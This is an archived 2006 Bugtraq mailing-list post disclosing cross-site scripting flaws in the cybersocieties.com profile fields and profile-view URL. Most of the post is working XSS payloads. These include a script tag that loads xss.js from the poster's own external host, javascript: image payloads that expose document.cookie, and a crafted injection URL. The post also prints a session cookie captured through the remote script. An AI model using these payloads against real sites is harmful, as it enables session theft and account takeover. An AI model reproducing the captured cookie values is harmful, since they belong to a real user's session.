| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060612223039.2206.qmail@securityfocus.com>
Date: 12 Jun 2006 22:30:39 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Cybersocieties.com - XSS & cookie disclosure
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Effected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
------------------------------------------------------
XSS vuln via input boxes in profile:
No filter evasion is needed. For PoC try putting the following codesin one of theboxes mentioned above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
or:
<IMG SRC=javascript:alert('XSS')>
or:
<IMG SRC="javascript:document.write(document.cookie)">
etc
Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg
Our Cookie:
This is remote text via xss.js located at youfucktard.com CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506
--------------------------------------------------------
Viewing a profile XSS vuln PoC:
http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'
Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg
Powered by blists - more mailing lists